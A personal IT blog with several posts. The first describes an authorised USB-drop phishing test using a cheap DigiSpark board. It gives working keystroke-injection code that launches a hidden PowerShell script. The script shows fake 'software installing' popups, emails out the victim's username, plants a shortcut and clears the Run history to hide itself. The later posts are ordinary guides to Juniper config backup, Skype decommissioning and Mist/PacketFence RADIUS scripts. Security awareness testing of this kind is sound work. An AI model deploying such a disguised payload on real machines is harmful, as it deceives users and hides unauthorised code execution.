Categories
Hacking

Poor mans Rubber Ducky in the UK

This is a long one!

So a month or so ago I went to an event titled “Cyber Security Masterclass” which was the first event I’ve been to since the whole COVID-19 lockdown thing. The event itself was OK, unfortunately, they aimed it at low-level technical engineers and decision-makers which made it difficult for myself and my boss who are quite technical. Whilst there the Security Analyst told me about a podcast called Darknet Diaries: https://darknetdiaries.com/ which I started listening to. Turns out I hit this podcast pretty hard listening to over 60 hours of episodes in a month… Whoops.

The other thing that the Security Analyst showed us was the good old Rubber Ducky which is a USB device that emulates a keyboard that you can put scripts onto. This is something I’d seen before but never really delved into.

After the event, I got an idea to try and use one of these devices at work. Got approval from my boss so I started looking into it further. I found the company that made the Rubber Ducky (https://hak5.org/products/usb-rubber-ducky-deluxe) and whilst they looked good I couldn’t justify £80 for a single device knowing that I was going to drop three of them off at different locations. Time to start looking at cheaper alternatives. Very quickly I stumbled across an Arduino board that does this sort of thing, the DigiSpark ATTINY85: https://www.amazon.co.uk/Reland-Sun-Digispark-Kickstarter-Development/dp/B08RRLRMYM/ref=sr_1_5?keywords=attiny85&qid=1636622041&s=computers&sr=1-5

These boards come in a variety of options from a development board to one that looks like a normal USB drive. As a PoC I went for the development board.

From here I followed this guide to get my computer set up and ready for coding up the board: https://maker.pro/arduino/projects/how-to-build-a-rubber-ducky-usb-with-arduino-using-a-digispark-module. Whilst this worked fine and got me up and running, I was running into issues with some of the special characters on the keyboard. After a bit of research, it appeared that the package I downloaded only supported US keyboard layouts 🤦. A lot of the research suggested modifying the scancode-ascii-table.h file to replace some of the special characters with ASCII characters that I needed. This seemed like a complete ballache for something that I’m surprised wasn’t baked into the solution from the get-go. However, after some more digging, I found another GitHub repo that had a Multi-Keyboard Layout option: https://github.com/rsrdesarrollo/DigistumpArduino. Going through this and re-adding the software through Board Manager in Arduino got me exactly what I needed.

So, so far so good, we have a USB chip that supports UK keyboard layouts and we’ve set up our computer to be able to write some code to the ATTINY85. So what’s left to do:

  1. Figure out a script to use which allows us to see which individuals have plugged in the USB.
  2. Sort out some casing for the USB device to make it a bit more realistic.
  3. Work out a plan to drop the USBs off at site.

So let’s look at the first thing. What do we want to do with our potential victims of this kind of attack? Obviously, we don’t want to do something that may potentially compromise our employer’s systems nor do we want to do anything that may get us caught. I think a script to send me an email with the username of who’s plugged the device into their computer should be a good one. Looking into this I found a few GitHub repos that have a variety of attack options, however, this one appeared to be one used by a lot of people: GitHub – CedArctic/DigiSpark-Scripts: USB Rubber Ducky type scripts written for the DigiSpark.

I decided to take advantage of Windows which has email functionality baked-in through .NET so a Powershell script was the obvious choice. At work, we recently replaced our networking infrastructure with a new vendor so I could take care of the third point with this too by posing the USB as some software to allow the IT Team to manage the network. After some messing about with Powershell here’s the script I came up with:

$StartingPopup = New-Object -ComObject Wscript.Shell
$StartingPopup.Popup("Network Management Software is being installed, please wait...",0,"Software Installing",0x1)

$LoggedInUser = $env:UserName
$User = "hackeddevice@test.com"
$password = Get-Content ".\EmailPwd.txt" | ConvertTo-SecureString -Key (Get-Content ".\EmailKey.aes")
$credential = New-Object System.Management.Automation.PSCredential $User, $password

## Define the Send-MailMessage parameters
$mailParams = @{
    SmtpServer                 = 'smtp.office365.com'
    Port                       = '587' 
    UseSSL                     = $true 
    Credential                 = $credential
    From                       = 'hackeddevice@test.com'
    To                         = 'talan@test.com
    Subject                    = "USB has been plugged in"
    Body                       = 'USB has been plugged in by ' + $LoggedInUser
    DeliveryNotificationOption = 'OnFailure', 'OnSuccess'
}

## Send the message
Send-MailMessage @mailParams

$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\Network Management System.lnk")
$Shortcut.IconLocation=".\Logo.ico"
$Shortcut.TargetPath = "https://manage.nms.com"
$Shortcut.Save()

##clean up run commands
$RunList = Get-ItemProperty -path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name "MRUList"
$LatestRun = $RunList.MRUList.SubString(0,1)
Remove-ItemProperty -path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" -Name $LatestRun

$CompletionPopup = New-Object -ComObject Wscript.Shell
$CompletionPopup.Popup("Network Management Software has been installed. There is a shortcut on your desktop.",0,"Software Installed",0x1)

A pretty simple Powershell script that pulls the logged-in username sets up some mail parameters and sends a mail, creates a shortcut on the users desktop and then displays a popup box to show that the “software” has been installed. The credentials have been encrypted using the following guide: https://www.altaro.com/msp-dojo/encrypt-password-powershell/

Right so to save me setting up a hosting server for these files I’m going to put them on a shared drive as I have access to it. If you were doing this for an organisation you didn’t have this access to, you’d need to set up a hosting server with the following files and probably use some unauthenticated SMTP Server to save on requiring encrypted credentials:

  1. Powershell script
  2. Shortcut Icon

Now we need to create use/modify the script from the GitHub repo above for executing a Powershell script and put it onto our USB Rubber Ducky: https://github.com/CedArctic/DigiSpark-Scripts/blob/master/Execute_Powershell_Script/Execute_Powershell_Script.ino

The main thing here for me is to remove the download client functions as we’re storing our file on a share that all users can access and then change the Execution Policy to allow the script to run and run it. So for us the Arduino code looks like this:

DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(100);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(400);
  DigiKeyboard.print("powershell.exe -ExecutionPolicy \"Unrestricted\" -WindowStyle \"hidden\" -File \"S:\\IT Services\\TalsScripts\\EmailScript.ps1\"");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);

We’re now onto the final stage, we’ve configured the device and created the relevant scripts we want to run however, we still have just an exposed logic board and it certainly looks very dodgy. To sort this one out I called on my previous knowledge of 3D printing, time to hit Thingiverse to see what’s available. Again quite quickly I stumbled across this STL file that seemed to have everything I needed: https://cults3d.com/en/3d-model/tool/digispark-attiny85-badusb-fake-usb-memory-case-remix. I got one of these printed at a local 3D printer shop and found the tolerances to be just a bit too tight. The board fitted but it felt like I was going to break it and the back piece wouldn’t connect to its slot without some filing, also getting the print of the bed of the printer caused some warping due to the top being so thin. I, therefore, went to Tinkercad to modify the STL file by increasing the size of the base by .15mm all the way around and increasing the height by 1mm. I also increased the height of the top by 1mm so it would fit into its slot.

So there we have it, a Rubber Ducky device set up to execute a Powershell script on plug into a computer that looks like a normal USB drive and for under £10 a device.

Categories
Networks

Automatically backing up Juniper switch configs

Over the past few years I’ve spent a considerable amount of time trying to find an cheap or free solution for backing up network devices at my workplace. As we were completely a Cisco house this lead be to installing RANCID on Ubuntu. This was a brilliant solution only taking a couple of hours to implement and backup the entire network.

Fast forward 8 years and things have changed dramatically, my workplace is no longer a Cisco only house, implementing Dell, Juniper, Fortinet and Cisco device into the network. This in turn has caused quite a bit of pain in getting our backups to work effectively. Our most recent requisition was some Juniper EX series switches. Investigation suggested that RANCID is capable of backing up Juniper equipment but it took some messing about to make it work. Here are the steps I have implemented to be able to get a backup of the switches:

  1. Software used:
    Ubuntu Linux
    RANCID 3.7
  2. Juniper Config
    Install a class specifically for the backup user:
set system login class backup permissions access
set system login class backup permissions admin
set system login class backup permissions firewall
set system login class backup permissions flow-tap
set system login class backup permissions interface
set system login class backup permissions network
set system login class backup permissions routing
set system login class backup permissions secret
set system login class backup permissions security
set system login class backup permissions snmp
set system login class backup permissions storage
set system login class backup permissions system
set system login class backup permissions trace
set system login class backup permissions view
set system login class backup permissions view-configuration

Install a new user and tie to the newly created class:

set system login user backup class backup
set system login user backup authentication plain-text-password

This isn’t ideal and the best way would be to implement the user with an SSH key-pair rather than passwords that way the RANCID server doesn’t have your network passwords in a plain text file.

3. RANCID Config

Here I have needed to make some modifications. First of all if you already have backups and are re-using the management addresses when migrating delete the files from the config folder and also the Entries file in the CVS folder of each individual site.

Modify your router.db file in your site folders to be the following for each of your juniper switches:

<deviceIP/name:deviceType:status>
router.name:juniper:up

Next you will need to modify the base file for types within RANCID, for me this was in /etc/rancid. In this file fine the following line:

juniper;command;junos::ShowConfiguration;show configuration

and change it to this:

juniper;command;junos::ShowConfiguration;show configuration | display set

If required, modify your .cloingrc file to include your newly created user and password here is what I did as a test:

add method 192.168.1.1 ssh
add user 192.168.1.1 backup
add password 192.168.1.1 passwordsetinjuniper

Then I needed to modify the junos perl script, for Ubuntu and the default install location this is in /usr/share/perl5/rancid/junos.pm. The following line needs to be commented:

next if (/^## last commit: /i);

Finally if you’re running this in Ubuntu run the login for Juniper to ensure that the server can login to switch successfully:

/usr/lib/rancid/bin/jlogin -f /var/lib/rancid/.cloginrc junipermgmtIP

If all is well and you can successfully login proceed to running the rancid-run file and monitor the logs to confirm the configuration have backed up:

sudo su -c /var/lib/rancid/bin/rancid-run -s /bin/bash -l rancid

Categories
Servers

Decommissioning Skype for Business 2015 Server

After attempting to decommission an old Skype for Business 2015 Enterprise Cluster we ran into an issue which was stopping us from decommissioning the cluster itself. The error being presented was “Can’t publish topology because users still homed to pool that would be deleted”. We thought that we had moved all of our contacts and users across to the new but after further investigation we found the following Powershell script which helped us along the way to get rid of the orphaned objects:

https://gallery.technet.microsoft.com/office/LyncS4B-Orphaned-Objects-03beadd7

Unfortunately, we ran into a problem where this script ended up presenting all of our response groups as being homed on our older cluster. We have identified the culprit piece of code and updated it to match against the pool FQDN you enter in the script. The script can be found below:

Categories
Networks

Mist/PacketFence Web Auth

Please note this is not supported by PacketFence/Inverse at the time of writing

There aren’t really any guides out there for Mist and Packetfence integration. During our time working with the Mist engineers we were able to get the authentication services working between Mist and PacketFence. We’ll submit this as a PR to Packetfence in the hope that it’s included in the main release.

Mist Configuration

To make this work you need to configure the Mist system with an SSID with the following security parameters:

Security Settings
Radius Settings
CoA Settings

From here the Mist system attempts to authenticate the device using RADIUS-MAB against the PacketFence system. Should PacketFence not authenticate the device, it returns a redirect request for the device which the Mist AP picks up and forwards to the client so that they can register.

The CoA settings are required here as, should the user no longer become registered e.g. PacketFence times out the device, then a CoA is sent to the Mist system for the device to be disassociated from the wireless environment.

PacketFence Configuration

Firstly, the Mist.pm perl script will need to be installed into the PacketFence environment so PacketFence understand hows to communicate with Mist and to perform the CoA requests as per the configuration. To access this please visit here: https://github.com/talanw/mist-packetfence

Mist uses the APs as a RADIUS Authenticator so each AP will need to be installed as a “Switch” in the PacketFence configuration. We have created a script to do this as PacketFence do not provide a POST in their API Documentation for config/switches as well as deployment of RADIUS to NPS which is available here: https://randomitstuff720939636.wordpress.com/2020/06/02/mist-nps-and-packetfence-radius-scripts/

However, should you only need to deploy one or two APs as part of a PoC then the switch settings required are as follows:

Definition
IP Address: Ip Address of the AP
Type: Cisco::Mist
Mode: Production
Deauthentication Method: RADIUS
Use CoA: Yes

Roles
Role by VLAN ID: Off
Role by Switch Role: Off
Role by Access List: Off
Role by Web Auth URL: On
registration: https://packetfence.contoso.com/Cisco::WLC

RADIUS
Secret Passphrase: RadiusSecretKey

Categories
Networks

Mist – NPS and PacketFence Radius Scripts

Here is a generic script for importing Mist APs into Microsoft’s NPS RADIUS Server and Packetfence’s Switching configurations:

Mist Setup

$Headers = @{
Authorization = "Token xWH84fgSnZTBMfA2eC9azGqNR2RFfgpmRGo9FGbaw0DlTm6enmfrK0cxkIYtEhdEvvRZesWddU222vHT82hnb0eSZecswe1iWl9h7C"
}
$Sites = @("771cb8f4-83ac-4385-bf4b-a68a61a8c853", "32f7bd38-9f01-4a3e-81b0-d4afbbc10f12", "e6f6d5c8-4dc9-4a55-ba76-1a903ec5d3f4", "d1320dcc-1e38-4d10-8518-19d844c119f4", "c8d2c1ea-76dd-4183-8cd4-5efcf3de6c4a", "b67b5694-03c2-4155-9b3d-751484b58c65", "dfcd013d-17b3-4805-9b91-2c86f70f3936" )
$SiteNames = @("Site 1", "Site 2", "Site 3", "Site 4", "Site 5", "Site 6", "Site 7")

packetfence setup

$LoginParams = @{"username"="admin";"password"="supersecretpassword"}
$PFLogin = Invoke-WebRequest -Uri "https://packetfence.contoso.com:1443/api/v1/login" -Method POST -Body ($LoginParams|ConvertTo-JSON)
$PFToken = ConvertFrom-Json $PFLogin.Content
$PFToken = $PFToken.token
$PFHeaders = @{
Authorization = "Bearer $PFToken"
}

System Loop

for($i=0; $i -lt $Sites.length; $i++)
{
	Write-Host "Performing checks on site:" $SiteNames[$i]
	$Uri = "https://api.mist.com/api/v1/sites/" + $Sites[$i] + "/stats/devices"
	$APStats = Invoke-WebRequest -Uri $Uri -Headers $Headers -ContentType "application/json"
	$Converted = ConvertFrom-Json $APStats
	$CurrentNPSClients = Get-NpsRadiusClient
	Foreach($AP in $Converted) {
	#check NPS and if the RADIUS Client doesn't exist create a new entry
	$ClientCheck = $false
	$NewNameObject = $AP.name
	$CurrentNPSClients | ForEach-Object {
		If($_.Name -eq $NewNameObject)
		{
			$ClientCheck = $true
		}
	}
	Write-Host "Is the AP already configured in NPS:" $ClientCheck
	if($ClientCheck -eq $false)
		{
		New-NpsRadiusClient -Name $AP.name -Address $AP.ip -SharedSecret "RadiusSharedSecret"
		}

		#check PacketFence to see whether there is a RADIUS Client if not create one
		try
		{
			$URIPF = "https://packetfence.contoso.com:1443/api/v1/config/switch/" + $AP.ip
			$URIPF
			$PFSwitch = Invoke-WebRequest -Uri $URIPF  -Headers $PFHeaders -ContentType "application/json"
			Write-Host "The AP already configured in PacketFence:" $AP.ip
		}
		catch
		{
			Write-Host "Adding the following AP to PacketFence:" $AP.ip
			$IP = $AP.ip
			$Desc = $AP.name
			$PostValues = @{"AccessListMap"=$null;"ExternalPortalEnforcement"="Y";"REJECTAccessList"=$null;"REJECTRole"=$null;"REJECTUrl"=$null;"REJECTVlan"=$null;"RoleMap"=$null;"SNMPAuthPasswordRead"=$null;"SNMPAuthPasswordTrap"=$null;"SNMPAuthPasswordWrite"=$null;"SNMPAuthProtocolRead"=$null;"SNMPAuthProtocolTrap"=$null;"SNMPAuthProtocolWrite"=$null;"SNMPCommunityRead"=$null;"SNMPCommunityTrap"=$null;"SNMPCommunityWrite"=$null;"SNMPEngineID"=$null;"SNMPPrivPasswordRead"=$null;"SNMPPrivPasswordTrap"=$null;"SNMPPrivPasswordWrite"=$null;"SNMPPrivProtocolRead"=$null;"SNMPPrivProtocolTrap"=$null;"SNMPPrivProtocolWrite"=$null;"SNMPUserNameRead"=$null;"SNMPUserNameTrap"=$null;"SNMPUserNameWrite"=$null;"SNMPVersion"=$null;"SNMPVersionTrap"=$null;"UrlMap"="Y";"VlanMap"="N";"VoIPCDPDetect"=$null;"VoIPDHCPDetect"=$null;"VoIPEnabled"=$null;"VoIPLLDPDetect"=$null;"cliAccess"=$null;"cliEnablePwd"=$null;"cliPwd"=$null;"cliTransport"=$null;"cliUser"=$null;"coaPort"=$null;"controllerIp"=$null;"deauthMethod"="RADIUS";"defaultAccessList"=$null;"defaultRole"=$null;"defaultUrl"=$null;"defaultVlan"=$null;"description"="$Desc";"disconnectPort"=$null;"gamingAccessList"=$null;"gamingRole"=$null;"gamingUrl"=$null;"gamingVlan"=$null;"group"="default";"guestAccessList"=$null;"guestRole"=$null;"guestUrl"=$null;"guestVlan"=$null;"id"="$IP";"inlineAccessList"=$null;"inlineRole"=$null;"inlineTrigger"=$null;"inlineUrl"=$null;"inlineVlan"=$null;"isolationAccessList"=$null;"isolationRole"=$null;"isolationUrl"=$null;"isolationVlan"=$null;"macSearchesMaxNb"=$null;"macSearchesSleepInterval"=$null;"mac_trigger"=$null;"mode"=$null;"port_trigger"=$null;"radiusSecret"="RadiusSharedSecret";"registrationAccessList"=$null;"registrationRole"=$null;"registrationUrl"="https://packetfence.contoso.com/Cisco::WLC";"registrationVlan"=$null;"ssid_trigger"=$null;"type"="Cisco::Mist";"uplink"=$null;"uplink_dynamic"="dynamic";"useCoA"="Y";"voiceAccessList"=$null;"voiceRole"=$null;"voiceUrl"=$null;"voiceVlan"=$null;"wsPwd"=$null;"wsTransport"=$null;"wsUser"=$null}
			$PFAddSwitch = Invoke-WebRequest -Uri "https://packetfence.contoso.com:1443/api/v1/config/switches" -Method POST -Headers $PFHeaders -Body ($PostValues|ConvertTo-JSON)
		}
	}
}